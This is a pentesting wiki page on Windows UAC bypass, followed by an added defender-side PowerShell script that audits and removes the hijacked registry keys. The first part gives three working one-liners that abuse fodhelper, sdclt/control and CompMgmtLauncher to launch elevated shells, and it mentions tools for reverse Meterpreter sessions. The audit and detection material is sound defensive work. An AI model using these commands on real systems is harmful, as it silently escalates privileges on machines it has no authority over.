UAC Bypass

From BHaFSec Pentesting Notes Wiki

UAC bypass methods with high integrity - credits to @enigma0x3 / @0rbz_ / @winscripting

https://github.com/hfiref0x/UACME - x86 and x64
TpmInitUACBypass - Bypass User Account Control (UAC) to get a High Integrity (or SYSTEM) reverse command shell, a reverse PowerShell session, or a reverse Meterpreter session.
TpmInitUACAnniversaryBypass - Same as above, but only works on Windows 10 x64 with the Anniversary Update (version 1607) applied.


UAC bypass for Win10 - control.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f


UAC bypass for Win10 - fodhelper.exe

reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f


UAC bypass for 7/8/10 - CompMgmtLauncher.exe

reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f
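All three one-liners above work the same way: they plant a command under a per-user registry key that an auto-elevating Windows binary (sdclt.exe/control.exe, fodhelper.exe, CompMgmtLauncher.exe) reads before it launches, then delete the key afterwards. The following PowerShell audit script is an added defender-side example, not part of the BHaFSec wiki page or of any of the tools it lists. It checks the current user's hive for those three keys (paths taken from the commands on this page), reports the machine's UAC prompt policy, and can remove leftover keys with a dry run via -WhatIf. The function names are this example's own.

```powershell
# Added defender-side audit script; it is not part of the BHaFSec wiki page.
# It checks the current user's registry hive for the keys hijacked by the
# three bypasses above and reports the machine's UAC prompt policy.

# Exact keys the one-liners above write to (the hijack points).
$HijackTargets = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe',   # control.exe / sdclt.exe variant
    'HKCU:\Software\Classes\ms-settings\shell\open\command',                   # fodhelper.exe variant
    'HKCU:\Software\Classes\mscfile\shell\open\command'                        # CompMgmtLauncher.exe variant
)

# Top-level keys the one-liners delete afterwards; nothing legitimate normally
# lives here for a standard user, so cleanup removes the whole key.
$CleanupRoots = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe',
    'HKCU:\Software\Classes\ms-settings',
    'HKCU:\Software\Classes\mscfile'
)

# Returns one object per hijack key that exists, with the command it points at.
function Get-UacHijackFinding {
    param([string[]]$Paths = $HijackTargets)

    foreach ($path in $Paths) {
        if (-not (Test-Path -LiteralPath $path)) { continue }
        $props = Get-ItemProperty -LiteralPath $path
        [PSCustomObject]@{
            Path            = $path
            Command         = $props.'(default)'   # e.g. "cmd.exe" in the one-liners above
            DelegateExecute = ($null -ne $props.PSObject.Properties['DelegateExecute'])
        }
    }
}

# Reports the UAC policy values that decide whether silent auto-elevation is
# allowed. ConsentPromptBehaviorAdmin = 2 ("Always notify") makes the
# auto-elevating binaries prompt instead of elevating silently; 5 is the default.
function Get-UacPolicy {
    $policy = Get-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    [PSCustomObject]@{
        EnableLUA                  = $policy.EnableLUA
        ConsentPromptBehaviorAdmin = $policy.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = $policy.PromptOnSecureDesktop
        AlwaysNotify               = ($policy.ConsentPromptBehaviorAdmin -eq 2)
    }
}

# Removes leftover hijack keys. Supports -WhatIf / -Confirm for a dry run.
function Remove-UacHijackKey {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([string[]]$Paths = $CleanupRoots)

    foreach ($path in $Paths) {
        if ((Test-Path -LiteralPath $path) -and $PSCmdlet.ShouldProcess($path, 'Remove registry key')) {
            Remove-Item -LiteralPath $path -Recurse -Force
        }
    }
}

# Run the audit for the current user and print the UAC policy.
$findings = @(Get-UacHijackFinding)
if ($findings.Count -eq 0) {
    Write-Output 'No hijacked auto-elevation keys found in HKCU.'
} else {
    $findings | Format-Table -AutoSize
}
Get-UacPolicy | Format-List

# Dry run of the cleanup; drop -WhatIf to actually remove the keys.
Remove-UacHijackKey -WhatIf
```

The script only sees HKCU for the user running it; to audit other profiles, check the same subpaths under HKEY_USERS\<SID> or load their NTUSER.DAT. Because the one-liners delete their keys within seconds, a point-in-time audit mostly catches failed or interrupted attempts; for ongoing detection, watch registry value-set events on these three paths (for example Sysmon Event ID 13) and alert on a low-integrity process writing them.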